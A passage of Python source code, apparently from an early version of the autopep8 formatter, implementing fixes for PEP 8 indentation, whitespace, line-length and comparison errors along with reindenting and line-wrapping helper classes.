\"\"\"Reindent all lines.\"\"\"\n reindenter = Reindenter(self.source)\n if reindenter.run():\n original_length = len(self.source)\n self.source = reindenter.fixed_lines()\n return range(1, 1 + original_length)\n else:\n return []\n\n def find_logical(self, force=False):\n # make a variable which is the index of all the starts of lines\n if not force and self.logical_start is not None:\n return\n logical_start = []\n logical_end = []\n last_newline = True\n sio = StringIO(\"\".join(self.source))\n parens = 0\n for t in tokenize.generate_tokens(sio.readline):\n if t[0] in [tokenize.COMMENT, tokenize.DEDENT,\n tokenize.INDENT, tokenize.NL,\n tokenize.ENDMARKER]:\n continue\n if not parens and t[0] in [\n tokenize.NEWLINE, tokenize.SEMI\n ]:\n last_newline = True\n logical_end.append((t[3][0] - 1, t[2][1]))\n continue\n if last_newline and not parens:\n logical_start.append((t[2][0] - 1, t[2][1]))\n last_newline = False\n if t[0] == tokenize.OP:\n if t[1] in '([{':\n parens += 1\n elif t[1] in '}])':\n parens -= 1\n self.logical_start = logical_start\n self.logical_end = logical_end\n\n def _get_logical(self, result):\n \"\"\"Return the logical line corresponding to the result.\n\n Assumes input is already E702-clean.\n\n \"\"\"\n try:\n self.find_logical()\n except (IndentationError, tokenize.TokenError):\n return None\n\n row = result['line'] - 1\n col = result['column'] - 1\n ls = None\n le = None\n for i in range(0, len(self.logical_start), 1):\n x = self.logical_end[i]\n if x[0] > row or (x[0] == row and x[1] > col):\n le = x\n ls = self.logical_start[i]\n break\n if ls is None:\n return None\n original = self.source[ls[0]:le[0] + 1]\n return ls, le, original\n\n def _fix_reindent(self, result, logical, fix_distinct=False):\n \"\"\"Fix a badly indented line.\n\n This is done by adding or removing from its initial indent only.\n\n \"\"\"\n if not logical:\n return []\n ls, _, original = logical\n try:\n rewrapper = Wrapper(original, hard_wrap=MAX_LINE_WIDTH)\n except (tokenize.TokenError, IndentationError):\n return []\n valid_indents = rewrapper.pep8_expected()\n if not rewrapper.rel_indent:\n return []\n if result[\"line\"] > ls[0]:\n # got a valid continuation line number from pep8\n row = result[\"line\"] - ls[0] - 1\n # always pick the first option for this\n valid = valid_indents[row]\n got = rewrapper.rel_indent[row]\n else:\n # Line number from pep8 isn't a continuation line. Instead,\n # compare our own function's result, look for the first mismatch,\n # and just hope that we take fewer than 100 iterations to finish.\n for row in range(0, len(original), 1):\n valid = valid_indents[row]\n got = rewrapper.rel_indent[row]\n if valid != got:\n break\n line = ls[0] + row\n # always pick the expected indent, for now.\n indent_to = valid[0]\n if fix_distinct and indent_to == 4:\n if len(valid) == 1:\n return []\n else:\n indent_to = valid[1]\n\n if got != indent_to:\n orig_line = self.source[line]\n new_line = ' ' * (indent_to) + orig_line.lstrip()\n if new_line == orig_line:\n return []\n else:\n self.source[line] = new_line\n return [line + 1] # Line indexed at 1\n else:\n return []\n\n def fix_e121(self, result, logical):\n \"\"\"The 'peculiar indent' error for hanging indents.\"\"\"\n # fix by adjusting initial indent level\n return self._fix_reindent(result, logical)\n\n def fix_e122(self, result, logical):\n \"\"\"The 'absent indent' error for hanging indents.\"\"\"\n # fix by adding an initial indent\n return self._fix_reindent(result, logical)\n\n def fix_e123(self, result, logical):\n \"\"\"The 'loose fingernails' indentation level error for hanging\n indents.\"\"\"\n # fix by deleting whitespace to the correct level\n modified_lines = self._fix_reindent(result, logical)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n if not logical:\n return []\n logical_lines = logical[2]\n line_index = result['line'] - 1\n original_line = self.source[line_index]\n\n fixed_line = (_get_indentation(logical_lines[0]) +\n original_line.lstrip())\n if fixed_line == original_line:\n return []\n else:\n self.source[line_index] = fixed_line\n\n def fix_e124(self, result, logical):\n \"\"\"The 'loose fingernails' indentation level error for visual\n indents.\"\"\"\n # fix by inserting whitespace before the closing bracket\n return self._fix_reindent(result, logical)\n\n def fix_e125(self, result, logical):\n \"\"\"The 'often not visually distinct' error.\"\"\"\n # fix by indenting the line in error to the next stop.\n modified_lines = self._fix_reindent(result, logical, fix_distinct=True)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n line_index = result['line'] - 1\n original_line = self.source[line_index]\n self.source[line_index] = self.indent_word + original_line\n\n def fix_e126(self, result, logical):\n \"\"\"The 'spectacular indent' error for hanging indents.\"\"\"\n # fix by deleting whitespace to the left\n modified_lines = self._fix_reindent(result, logical)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n if not logical:\n return []\n logical_lines = logical[2]\n line_index = result['line'] - 1\n original = self.source[line_index]\n\n fixed = (_get_indentation(logical_lines[0]) +\n self.indent_word + original.lstrip())\n if fixed == original:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e127(self, result, logical):\n \"\"\"The 'interpretive dance' indentation error.\"\"\"\n # Fix by inserting/deleting whitespace to the correct level.\n modified_lines = self._fix_reindent(result, logical)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n return self._align_visual_indent(result, logical)\n\n def _align_visual_indent(self, result, logical):\n \"\"\"Correct visual indent.\n\n This includes over (E127) and under (E128) indented lines.\n\n \"\"\"\n if not logical:\n return []\n logical_lines = logical[2]\n line_index = result['line'] - 1\n original = self.source[line_index]\n fixed = original\n\n if '(' in logical_lines[0]:\n fixed = logical_lines[0].find('(') * ' ' + original.lstrip()\n elif logical_lines[0].rstrip().endswith('\\\\'):\n fixed = (_get_indentation(logical_lines[0]) +\n self.indent_word + original.lstrip())\n else:\n return []\n\n if fixed == original:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e201(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n # When multiline strings are involved, pep8 reports the error as\n # being at the start of the multiline string, which doesn't work\n # for us.\n if '\"\"\"' in target or \"'''\" in target:\n return []\n\n fixed = fix_whitespace(target,\n offset=offset,\n replacement='')\n\n if fixed == target:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e224(self, result):\n target = self.source[result['line'] - 1]\n offset = result['column'] - 1\n fixed = target[:offset] + target[offset:].replace('\\t', ' ')\n self.source[result['line'] - 1] = fixed\n\n def fix_e225(self, result):\n \"\"\"Fix whitespace around operator.\"\"\"\n target = self.source[result['line'] - 1]\n offset = result['column'] - 1\n fixed = target[:offset] + ' ' + target[offset:]\n\n # Only proceed if non-whitespace characters match.\n # And make sure we don't break the indentation.\n if (fixed.replace(' ', '') == target.replace(' ', '') and\n _get_indentation(fixed) == _get_indentation(target)):\n self.source[result['line'] - 1] = fixed\n else:\n return []\n\n def fix_e231(self, result):\n \"\"\"Add missing whitespace.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column']\n fixed = target[:offset] + ' ' + target[offset:]\n self.source[line_index] = fixed\n\n def fix_e251(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n\n # This is necessary since pep8 sometimes reports columns that goes\n # past the end of the physical line. This happens in cases like,\n # foo(bar\\n=None)\n c = min(result['column'] - 1,\n len(target) - 1)\n\n if target[c].strip():\n fixed = target\n else:\n fixed = target[:c].rstrip() + target[c:].lstrip()\n\n # There could be an escaped newline\n #\n # def foo(a=\\\n # 1)\n if (fixed.endswith('=\\\\\\n') or\n fixed.endswith('=\\\\\\r\\n') or\n fixed.endswith('=\\\\\\r')):\n self.source[line_index] = fixed.rstrip('\\n\\r \\t\\\\')\n self.source[line_index + 1] = \\\n self.source[line_index + 1].lstrip()\n return [line_index + 1, line_index + 2] # Line indexed at 1\n\n self.source[result['line'] - 1] = fixed\n\n def fix_e262(self, result):\n \"\"\"Fix spacing after comment hash.\"\"\"\n target = self.source[result['line'] - 1]\n offset = result['column']\n\n code = target[:offset].rstrip(' \\t#')\n comment = target[offset:].lstrip(' \\t#')\n\n fixed = code + (' # ' + comment if comment.strip()\n else self.newline)\n\n self.source[result['line'] - 1] = fixed\n\n def fix_e271(self, result):\n \"\"\"Fix extraneous whitespace around keywords.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n fixed = fix_whitespace(target,\n offset=offset,\n replacement=' ')\n\n if fixed == target:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e301(self, result):\n cr = self.newline\n self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]\n\n def fix_e302(self, result):\n add_linenum = 2 - int(result['info'].split()[-1])\n cr = self.newline * add_linenum\n self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]\n\n def fix_e304(self, result):\n line = result['line'] - 2\n if not self.source[line].strip():\n self.source[line] = ''\n\n def fix_e303(self, result):\n delete_linenum = int(result['info'].split(\"(\")[1].split(\")\")[0]) - 2\n delete_linenum = max(1, delete_linenum)\n\n # We need to count because pep8 reports an offset line number if there\n # are comments.\n cnt = 0\n line = result['line'] - 2\n modified_lines = []\n while cnt < delete_linenum:\n if line < 0:\n break\n if not self.source[line].strip():\n self.source[line] = ''\n modified_lines.append(1 + line) # Line indexed at 1\n cnt += 1\n line -= 1\n\n return modified_lines\n\n def fix_e401(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n if not target.lstrip().startswith('import'):\n return []\n\n # pep8 (1.3.1) reports false positive if there is an import statement\n # followed by a semicolon and some unrelated statement with commas in\n # it.\n if ';' in target:\n return []\n\n indentation = target.split(\"import \")[0]\n fixed = (target[:offset].rstrip('\\t ,') + self.newline +\n indentation + 'import ' + target[offset:].lstrip('\\t ,'))\n self.source[line_index] = fixed\n\n def fix_e501(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n\n indent = _get_indentation(target)\n source = target[len(indent):]\n sio = StringIO(target)\n\n # Check for multiline string.\n try:\n tokens = list(tokenize.generate_tokens(sio.readline))\n except (tokenize.TokenError, IndentationError):\n multi_line_candidate = break_multi_line(\n target, newline=self.newline, indent_word=self.indent_word)\n\n if multi_line_candidate:\n self.source[line_index] = multi_line_candidate\n return\n else:\n return []\n\n # Prefer\n # my_long_function_name(\n # x, y, z, ...)\n #\n # over\n # my_long_function_name(x, y,\n # z, ...)\n candidate0 = _shorten_line(tokens, source, target, indent,\n self.indent_word, newline=self.newline,\n reverse=False)\n candidate1 = _shorten_line(tokens, source, target, indent,\n self.indent_word, newline=self.newline,\n reverse=True)\n if candidate0 and candidate1:\n if candidate0.split(self.newline)[0].endswith('('):\n self.source[line_index] = candidate0\n else:\n self.source[line_index] = candidate1\n elif candidate0:\n self.source[line_index] = candidate0\n elif candidate1:\n self.source[line_index] = candidate1\n else:\n # Otherwise both don't work\n return []\n\n def fix_e502(self, result):\n \"\"\"Remove extraneous escape of newline.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n self.source[line_index] = target.rstrip('\\n\\r \\t\\\\') + self.newline\n\n def fix_e701(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n c = result['column']\n\n fixed_source = (target[:c] + self.newline +\n _get_indentation(target) + self.indent_word +\n target[c:].lstrip('\\n\\r \\t\\\\'))\n self.source[result['line'] - 1] = fixed_source\n\n def fix_e702(self, result, logical):\n \"\"\"Fix multiple statements on one line.\"\"\"\n logical_lines = logical[2]\n\n line_index = result['line'] - 1\n target = self.source[line_index]\n\n if target.rstrip().endswith('\\\\'):\n # Normalize '1; \\\\\\n2' into '1; 2'.\n self.source[line_index] = target.rstrip('\\n \\r\\t\\\\')\n self.source[line_index + 1] = self.source[line_index + 1].lstrip()\n return [line_index + 1, line_index + 2]\n\n if target.rstrip().endswith(';'):\n self.source[line_index] = target.rstrip('\\n \\r\\t;') + self.newline\n return\n\n offset = result['column'] - 1\n first = target[:offset].rstrip(';')\n second = (_get_indentation(logical_lines[0]) +\n target[offset:].lstrip(';').lstrip())\n\n self.source[line_index] = first + self.newline + second\n\n def fix_e711(self, result):\n \"\"\"Fix comparison.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n right_offset = offset + 2\n if right_offset >= len(target):\n return []\n\n left = target[:offset].rstrip()\n center = target[offset:right_offset]\n right = target[right_offset:].lstrip()\n\n if not right.startswith('None'):\n return []\n\n if center.strip() == '==':\n new_center = 'is'\n elif center.strip() == '!=':\n new_center = 'is not'\n else:\n return []\n\n self.source[line_index] = ' '.join([left, new_center, right])\n\n def fix_e721(self, _):\n return self.refactor('idioms')\n\n def fix_w291(self, result):\n fixed_line = self.source[result['line'] - 1].rstrip()\n self.source[result['line'] - 1] = \"%s%s\" % (fixed_line, self.newline)\n\n def fix_w293(self, result):\n assert not self.source[result['line'] - 1].strip()\n self.source[result['line'] - 1] = self.newline\n\n def fix_w391(self, _):\n source = copy.copy(self.source)\n source.reverse()\n blank_count = 0\n for line in source:\n line = line.rstrip()\n if line:\n break\n else:\n blank_count += 1\n source = source[blank_count:]\n source.reverse()\n\n original_length = len(self.source)\n self.source = source\n return range(1, 1 + original_length)\n\n def refactor(self, fixer_name, ignore=None):\n \"\"\"Return refactored code using lib2to3.\n\n Skip if ignore string is produced in the refactored code.\n\n \"\"\"\n from lib2to3 import pgen2\n try:\n new_text = refactor_with_2to3(''.join(self.source),\n fixer_name=fixer_name)\n except pgen2.parse.ParseError:\n return []\n\n if ''.join(self.source).strip() == new_text.strip():\n return []\n else:\n if ignore:\n if ignore in new_text and ignore not in ''.join(self.source):\n return []\n original_length = len(self.source)\n self.source = [new_text]\n return range(1, 1 + original_length)\n\n def fix_w601(self, _):\n return self.refactor('has_key')\n\n def fix_w602(self, _):\n \"\"\"Fix deprecated form of raising exception.\"\"\"\n return self.refactor('raise',\n ignore='with_traceback')\n\n def fix_w603(self, _):\n return self.refactor('ne')\n\n def fix_w604(self, _):\n return self.refactor('repr')\n\n\ndef find_newline(source):\n \"\"\"Return type of newline used in source.\"\"\"\n cr, lf, crlf = 0, 0, 0\n for s in source:\n if CRLF in s:\n crlf += 1\n elif CR in s:\n cr += 1\n elif LF in s:\n lf += 1\n _max = max(cr, crlf, lf)\n if _max == lf:\n return LF\n elif _max == crlf:\n return CRLF\n elif _max == cr:\n return CR\n else:\n return LF\n\n\ndef _get_indentword(source):\n \"\"\"Return indentation type.\"\"\"\n sio = StringIO(source)\n indent_word = \" \" # Default in case source has no indentation\n try:\n for t in tokenize.generate_tokens(sio.readline):\n if t[0] == token.INDENT:\n indent_word = t[1]\n break\n except (tokenize.TokenError, IndentationError):\n pass\n return indent_word\n\n\ndef _get_indentation(line):\n \"\"\"Return leading whitespace.\"\"\"\n non_whitespace_index = len(line) - len(line.lstrip())\n return line[:non_whitespace_index]\n\n\ndef _split_indentation(line):\n \"\"\"Return line split into tuple (indentation, rest).\"\"\"\n non_whitespace_index = len(line) - len(line.lstrip())\n return (line[:non_whitespace_index], line[non_whitespace_index:])\n\n\ndef _analyze_pep8result(result):\n tmp = result.split(\":\")\n filename = tmp[0]\n line = int(tmp[1])\n column = int(tmp[2])\n info = \" \".join(result.split()[1:])\n pep8id = info.lstrip().split()[0]\n return dict(id=pep8id, filename=filename, line=line,\n column=column, info=info)\n\n\ndef _get_difftext(old, new, filename):\n diff = unified_diff(old, new, 'original/' + filename, 'fixed/' + filename)\n return \"\".join(diff)\n\n\ndef _priority_key(pep8_result):\n \"\"\"Key for sorting PEP8 results.\n\n Global fixes should be done first. This is important for things\n like indentation.\n\n \"\"\"\n priority = ['e101', 'e111', 'w191', # Global fixes\n 'e701', # Fix multiline colon-based before semicolon based\n 'e702', # Break multiline statements early\n 'e225', 'e231', # things that make lines longer\n 'e201', # Remove extraneous whitespace before breaking lines\n 'e501', # before we break lines\n ]\n key = pep8_result['id'].lower()\n if key in priority:\n return priority.index(key)\n else:\n # Lowest priority\n return len(priority)\n\n\ndef _shorten_line(tokens, source, target, indentation, indent_word, newline,\n reverse=False):\n \"\"\"Separate line at OPERATOR.\"\"\"\n max_line_width_minus_indentation = MAX_LINE_WIDTH - len(indentation)\n if reverse:\n tokens.reverse()\n for tkn in tokens:\n # Don't break on '=' after keyword as this violates PEP 8.\n if token.OP == tkn[0] and tkn[1] != '=':\n offset = tkn[2][1] + 1\n if reverse:\n if offset > (max_line_width_minus_indentation -\n len(indent_word)):\n continue\n else:\n if (len(target.rstrip()) - offset >\n (max_line_width_minus_indentation -\n len(indent_word))):\n continue\n first = source[:offset - len(indentation)]\n\n second_indent = indentation\n if first.rstrip().endswith('('):\n second_indent += indent_word\n elif '(' in first:\n second_indent += ' ' * (1 + first.find('('))\n else:\n second_indent += indent_word\n\n second = (second_indent +\n source[offset - len(indentation):].lstrip())\n if not second.strip():\n continue\n\n # Don't modify if lines are not short enough\n if len(first) > max_line_width_minus_indentation:\n continue\n if len(second) > MAX_LINE_WIDTH: # Already includes indentation\n continue\n # Do not begin a line with a comma\n if second.lstrip().startswith(','):\n continue\n # Do end a line with a dot\n if first.rstrip().endswith('.'):\n continue\n if tkn[1] in '+-*/':\n fixed = first + ' \\\\' + newline + second\n else:\n fixed = first + newline + second\n if check_syntax(fixed):\n return indentation + fixed\n return None\n\n\ndef fix_whitespace(line, offset, replacement):\n \"\"\"Replace whitespace at offset and return fixed line.\"\"\"\n # Replace escaped newlines too\n left = line[:offset].rstrip('\\n\\r \\t\\\\')\n right = line[offset:].lstrip('\\n\\r \\t\\\\')\n if right.startswith('#'):\n return line\n else:\n return left + replacement + right\n\n\ndef _spawn_pep8(pep8_options):\n \"\"\"Execute pep8 via subprocess.Popen.\"\"\"\n paths = os.environ['PATH'].split(':')\n for path in paths:\n if os.path.exists(os.path.join(path, PEP8_BIN)):\n cmd = ([os.path.join(path, PEP8_BIN)] +\n pep8_options)\n p = Popen(cmd, stdout=PIPE)\n output = p.communicate()[0].decode('utf-8')\n return [_analyze_pep8result(l)\n for l in output.splitlines()]\n raise Exception(\"'%s' is not found.\" % PEP8_BIN)\n\n\ndef _execute_pep8(pep8_options, source):\n \"\"\"Execute pep8 via python method calls.\"\"\"\n class QuietReport(pep8.BaseReport):\n\n \"\"\"Version of checker that does not print.\"\"\"\n\n def __init__(self, options):\n super(QuietReport, self).__init__(options)\n self.__full_error_results = []\n\n def error(self, line_number, offset, text, _):\n \"\"\"Collect errors.\"\"\"\n code = super(QuietReport, self).error(line_number, offset, text, _)\n if code:\n self.__full_error_results.append(\n dict(id=code, line=line_number,\n column=offset + 1, info=text))\n\n def full_error_results(self):\n \"\"\"Return error results in detail.\n\n Results are in the form of a list of dictionaries. Each dictionary\n contains 'id', 'line', 'column', and 'info'.\n\n \"\"\"\n return self.__full_error_results\n\n checker = pep8.Checker('', lines=source,\n reporter=QuietReport, **pep8_options)\n checker.check_all()\n return checker.report.full_error_results()\n\n\nclass Reindenter(object):\n\n \"\"\"Reindents badly-indented code to uniformly use four-space indentation.\n\n Released to the public domain, by Tim Peters, 03 October 2000.\n\n \"\"\"\n\n def __init__(self, input_text):\n self.find_stmt = 1 # next token begins a fresh stmt?\n self.level = 0 # current indent level\n\n # Raw file lines.\n self.raw = input_text\n self.after = None\n\n # File lines, rstripped & tab-expanded. Dummy at start is so\n # that we can use tokenize's 1-based line numbering easily.\n # Note that a line is all-blank iff it's \"\\n\".\n self.lines = [line.rstrip('\\n \\t').expandtabs() + \"\\n\"\n for line in self.raw]\n self.lines.insert(0, None)\n self.index = 1 # index into self.lines of next line\n\n # List of (lineno, indentlevel) pairs, one for each stmt and\n # comment line. indentlevel is -1 for comment lines, as a\n # signal that tokenize doesn't know what to do about them;\n # indeed, they're our headache!\n self.stats = []\n\n def run(self):\n tokens = tokenize.generate_tokens(self.getline)\n try:\n for t in tokens:\n self.tokeneater(*t)\n except (tokenize.TokenError, IndentationError):\n return False\n # Remove trailing empty lines.\n lines = self.lines\n while lines and lines[-1] == \"\\n\":\n lines.pop()\n # Sentinel.\n stats = self.stats\n stats.append((len(lines), 0))\n # Map count of leading spaces to # we want.\n have2want = {}\n # Program after transformation.\n after = self.after = []\n # Copy over initial empty lines -- there's nothing to do until\n # we see a line with *something* on it.\n i = stats[0][0]\n after.extend(lines[1:i])\n for i in range(len(stats) - 1):\n thisstmt, thislevel = stats[i]\n nextstmt = stats[i + 1][0]\n have = _leading_space_count(lines[thisstmt])\n want = thislevel * 4\n if want < 0:\n # A comment line.\n if have:\n # An indented comment line. If we saw the same\n # indentation before, reuse what it most recently\n # mapped to.\n want = have2want.get(have, - 1)\n if want < 0:\n # Then it probably belongs to the next real stmt.\n for j in range(i + 1, len(stats) - 1):\n jline, jlevel = stats[j]\n if jlevel >= 0:\n if have == _leading_space_count(lines[jline]):\n want = jlevel * 4\n break\n if want < 0: # Maybe it's a hanging\n # comment like this one,\n # in which case we should shift it like its base\n # line got shifted.\n for j in range(i - 1, -1, -1):\n jline, jlevel = stats[j]\n if jlevel >= 0:\n want = (have + _leading_space_count(\n after[jline - 1]) -\n _leading_space_count(lines[jline]))\n break\n if want < 0:\n # Still no luck -- leave it alone.\n want = have\n else:\n want = 0\n assert want >= 0\n have2want[have] = want\n diff = want - have\n if diff == 0 or have == 0:\n after.extend(lines[thisstmt:nextstmt])\n else:\n for line in lines[thisstmt:nextstmt]:\n if diff > 0:\n if line == \"\\n\":\n after.append(line)\n else:\n after.append(\" \" * diff + line)\n else:\n remove = min(_leading_space_count(line), -diff)\n after.append(line[remove:])\n return self.raw != self.after\n\n def fixed_lines(self):\n return self.after\n\n def getline(self):\n \"\"\"Line-getter for tokenize.\"\"\"\n if self.index >= len(self.lines):\n line = \"\"\n else:\n line = self.lines[self.index]\n self.index += 1\n return line\n\n def tokeneater(self, token_type, _, start, __, line):\n \"\"\"Line-eater for tokenize.\"\"\"\n sline = start[0]\n if token_type == tokenize.NEWLINE:\n # A program statement, or ENDMARKER, will eventually follow,\n # after some (possibly empty) run of tokens of the form\n # (NL | COMMENT)* (INDENT | DEDENT+)?\n self.find_stmt = 1\n\n elif token_type == tokenize.INDENT:\n self.find_stmt = 1\n self.level += 1\n\n elif token_type == tokenize.DEDENT:\n self.find_stmt = 1\n self.level -= 1\n\n elif token_type == tokenize.COMMENT:\n if self.find_stmt:\n self.stats.append((sline, -1))\n # but we're still looking for a new stmt, so leave\n # find_stmt alone\n\n elif token_type == tokenize.NL:\n pass\n\n elif self.find_stmt:\n # This is the first \"real token\" following a NEWLINE, so it\n # must be the first token of the next program statement, or an\n # ENDMARKER.\n self.find_stmt = 0\n if line: # not endmarker\n self.stats.append((sline, self.level))\n\n\nclass Wrapper(object):\n\n \"\"\"Class for functions relating to continuation lines and line folding.\n\n Each instance operates on a single logical line.\n\n \"\"\"\n\n SKIP_TOKENS = frozenset([\n tokenize.COMMENT, tokenize.NL, tokenize.INDENT,\n tokenize.DEDENT, tokenize.NEWLINE, tokenize.ENDMARKER\n ])\n\n def __init__(self, physical_lines, hard_wrap=79, soft_wrap=72):\n if type(physical_lines) != list:\n physical_lines = physical_lines.splitlines(keepends=True)\n self.lines = physical_lines\n self.index = 0\n self.hard_wrap = hard_wrap\n self.soft_wrap = soft_wrap\n self.tokens = list()\n self.rel_indent = None\n sio = StringIO(\"\".join(physical_lines))\n for t in tokenize.generate_tokens(sio.readline):\n if not len(self.tokens) and t[0] in self.SKIP_TOKENS:\n continue\n if t[0] != tokenize.ENDMARKER:\n #if t[2][0] > max_seen:\n #max_seen = t[2][0]\n #print \">>\" + repr(t[4]) + \"<<\"\n self.tokens.append(t)\n self.logical_line, self.mapping = self.build_tokens_logical(\n self.tokens\n )\n\n def build_tokens_logical(self, tokens):\n \"\"\"Build a logical line from a list of tokens.\n\n Returns the logical line and a list of (offset, token) tuples. Does\n not mute strings like the version in pep8.py.\n\n \"\"\"\n # from pep8.py with minor modifications\n mapping = []\n logical = []\n length = 0\n previous = None\n for t in tokens:\n token_type, text = t[0:2]\n if token_type in self.SKIP_TOKENS:\n continue\n if previous:\n end_line, end = previous[3]\n start_line, start = t[2]\n if end_line != start_line: # different row\n prev_text = self.lines[end_line - 1][end - 1]\n if prev_text == ',' or (prev_text not in '{[('\n and text not in '}])'):\n logical.append(' ')\n length += 1\n elif end != start: # different column\n fill = self.lines[end_line - 1][end:start]\n logical.append(fill)\n length += len(fill)\n mapping.append((length, t))\n logical.append(text)\n length += len(text)\n previous = t\n logical_line = ''.join(logical)\n assert logical_line.lstrip() == logical_line\n assert logical_line.rstrip() == logical_line\n return logical_line, mapping\n\n def pep8_expected(self):\n \"\"\"Replicates logic in pep8.py, to know what level to indent things to.\n\n Returns a list of lists; each list represents valid indent levels for\n the line in question, relative from the initial indent. However, the\n first entry is the indent level which was expected.\n\n \"\"\"\n\n # What follows is an adjusted version of\n # pep8.py:continuation_line_indentation. All of the comments have been\n # stripped and the 'yield' statements replaced with 'pass'.\n tokens = self.tokens\n if not tokens:\n return\n\n first_row = tokens[0][2][0]\n nrows = 1 + tokens[-1][2][0] - first_row\n\n # here are the return values\n valid_indents = [list()] * nrows\n indent_level = tokens[0][2][1]\n valid_indents[0].append(indent_level)\n\n if nrows == 1:\n # bug, really.\n return valid_indents\n\n indent_next = self.logical_line.endswith(':')\n\n row = depth = 0\n parens = [0] * nrows\n self.rel_indent = rel_indent = [0] * nrows\n indent = [indent_level]\n indent_chances = {}\n last_indent = (0, 0)\n last_token_multiline = None\n\n for token_type, text, start, end, _ in self.tokens:\n newline = row < start[0] - first_row\n if newline:\n row = start[0] - first_row\n newline = (not last_token_multiline and\n token_type not in (tokenize.NL, tokenize.NEWLINE))\n\n if newline:\n # This is where the differences start. Instead of looking at\n # the line and determining whether the observed indent matches\n # our expectations, we decide which type of indentation is in\n # use at the given indent level, and return the offset. This\n # algorithm is susceptible to \"carried errors\", but should\n # through repeated runs eventually solve indentation for\n # multi-line expressions less than PEP8_PASSES_MAX lines long.\n\n if depth:\n for open_row in range(row - 1, -1, -1):\n if parens[open_row]:\n break\n else:\n open_row = 0\n\n # That's all we get to work with. This code attempts to\n # \"reverse\" the below logic, and place into the valid indents\n # list\n vi = []\n add_second_chances = False\n if token_type == tokenize.OP and text in ']})':\n # this line starts with a closing bracket, so it needs to\n # be closed at the same indent as the opening one.\n if indent[depth]:\n # hanging indent\n vi.append(indent[depth])\n else:\n # visual indent\n vi.append(indent_level + rel_indent[open_row])\n elif depth and indent[depth]:\n # visual indent was previously confirmed.\n vi.append(indent[depth])\n add_second_chances = True\n elif depth and True in indent_chances.values():\n # visual indent happened before, so stick to\n # visual indent this time.\n if depth > 1 and indent[depth - 1]:\n vi.append(indent[depth - 1])\n else:\n # stupid fallback\n vi.append(indent_level + 4)\n add_second_chances = True\n elif not depth:\n vi.append(indent_level + 4)\n else:\n # must be in hanging indent\n hang = rel_indent[open_row] + 4\n vi.append(indent_level + hang)\n\n # about the best we can do without look-ahead\n if indent_next and vi[0] == indent_level + 4 and \\\n nrows == row + 1:\n vi[0] += 4\n\n if add_second_chances:\n # visual indenters like to line things up.\n min_indent = vi[0]\n for col, what in indent_chances.items():\n if col > min_indent and (\n what is True or\n (what == str and token_type == tokenize.STRING) or\n (what == text and token_type == tokenize.OP)\n ):\n vi.append(col)\n vi = sorted(vi)\n\n valid_indents[row] = vi\n\n # ...returning to original continuation_line_identation func...\n visual_indent = indent_chances.get(start[1])\n last_indent = start\n rel_indent[row] = start[1] - indent_level\n hang = rel_indent[row] - rel_indent[open_row]\n\n if token_type == tokenize.OP and text in ']})':\n if indent[depth]:\n if start[1] != indent[depth]:\n pass # E124\n elif hang:\n pass # E123\n elif visual_indent is True:\n if not indent[depth]:\n indent[depth] = start[1]\n elif visual_indent in (text, str):\n pass\n elif indent[depth] and start[1] < indent[depth]:\n pass # E128\n elif hang == 4 or (indent_next and rel_indent[row] == 8):\n pass\n else:\n if hang <= 0:\n pass # E122\n elif indent[depth]:\n pass # E127\n elif hang % 4:\n pass # E121\n else:\n pass # E126\n\n # line altered: comments shouldn't define a visual indent\n if parens[row] and not indent[depth] and token_type not in (\n tokenize.NL, tokenize.COMMENT\n ):\n indent[depth] = start[1]\n indent_chances[start[1]] = True\n elif token_type == tokenize.STRING or text in (\n 'u', 'ur', 'b', 'br'\n ):\n indent_chances[start[1]] = str\n\n if token_type == tokenize.OP:\n if text in '([{':\n depth += 1\n indent.append(0)\n parens[row] += 1\n elif text in ')]}' and depth > 0:\n prev_indent = indent.pop() or last_indent[1]\n for d in range(depth):\n if indent[d] > prev_indent:\n indent[d] = 0\n for ind in list(indent_chances):\n if ind >= prev_indent:\n del indent_chances[ind]\n depth -= 1\n if depth and indent[depth]: # modified\n indent_chances[indent[depth]] = True\n for idx in range(row, -1, -1):\n if parens[idx]:\n parens[idx] -= 1\n break\n assert len(indent) == depth + 1\n if start[1] not in indent_chances:\n indent_chances[start[1]] = text\n\n last_token_multiline = (start[0] != end[0])\n\n if indent_next and rel_indent[-1] == 4:\n pass # E125\n\n return valid_indents\n\n\ndef _leading_space_count(line):\n \"\"\"Return number of leading spaces in line.\"\"\"\n i = 0\n while i < len(line) and line[i] == ' ':\n i += 1\n return i\n\n\ndef refactor_with_2to3(source_text, fixer_name):\n \"\"\"Use lib2to3 to refactor the source.\n\n Return the refactored source code.\n\n \"\"\"\n from lib2to3 import refactor\n fixers = ['lib2to3.fixes.fix_' + fixer_name]\n tool = refactor.RefactoringTool(\n fixer_names=fixers,\n explicit=fixers)\n return str(tool.refactor_string(source_text, name=''))\n\n\ndef break_multi_line(source_text, newline, indent_word):\n \"\"\"Break first line of multi-line code.\n\n Return None if a break is not possible.\n\n \"\"\"\n # Handle special case only.\n if ('(' in source_text and source_text.rstrip().endswith(',')):\n index = 1 + source_text.find('(')\n if index >= MAX_LINE_WIDTH:\n return None\n\n # Make sure we are not in a string.\n for quote in ['\"', \"'\"]:\n if quote in source_text:\n if source_text.find(quote) < index:\n return None\n\n # Make sure we are not in a comment.\n if '#' in source_text:\n if source_text.find('#') < index:\n return None\n\n assert index < len(source_text)\n return (\n source_text[:index].rstrip() + newline +\n _get_indentation(source_text) + indent_word +\n source_text[index:].lstrip())\n else:\n return 